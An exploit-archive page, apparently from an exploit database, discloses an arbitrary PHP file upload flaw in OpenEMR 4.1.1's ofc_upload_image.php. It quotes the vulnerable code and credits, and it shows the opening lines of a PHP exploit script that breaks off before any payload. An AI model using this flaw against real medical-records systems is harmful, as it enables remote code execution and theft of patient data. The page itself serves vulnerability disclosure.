[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : OpenEMR 4.1.1 (ofc_upload_image.php) Arbitrary File Upload Vulnerability
# Published : 2013-02-13
# Author :
# Previous Title : Netgear DGN2200B - Multiple Vulnerabilities
# Next Title : Scripts Genie Pet Rate Pro - Multiple Vulnerabilities
?<?php
/*
OpenEMR 4.1.1 (ofc_upload_image.php) Arbitrary File Upload Vulnerability
Vendor: OpenEMR
Product web page: http://www.open-emr.org
Affected version: 4.1.1
Summary: OpenEMR is a Free and Open Source electronic health records and medical
practice management application that can run on Windows, Linux, Mac OS X, and many
other platforms.
Desc: The vulnerability is caused due to the improper verification of uploaded
files in '/library/openflashchart/php-ofc-library/ofc_upload_image.php' script
thru the 'name' parameter. This can be exploited to execute arbitrary PHP code
by uploading a malicious PHP script with multiple extensions.
================================================================================
/library/openflashchart/php-ofc-library/ofc_upload_image.php:
-------------------------------------------------------------
21: $default_path = '../tmp-upload-images/';
23: if (!file_exists($default_path)) mkdir($default_path, 0777, true);
26: $destination = $default_path . basename( $_GET[ 'name' ] );
28: echo 'Saving your image to: '. $destination;
39: $jfh = fopen($destination, 'w') or die("can't open file");
40: fwrite($jfh, $HTTP_RAW_POST_DATA);
41: fclose($jfh);
46: exit();
================================================================================
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Fedora Linux
Apache2, PHP 5.4 MySQL 5.5
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2013-5126
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5126.php
09.02.2013
*/
error_reporting(0);
set_time_limit(0);
$go = "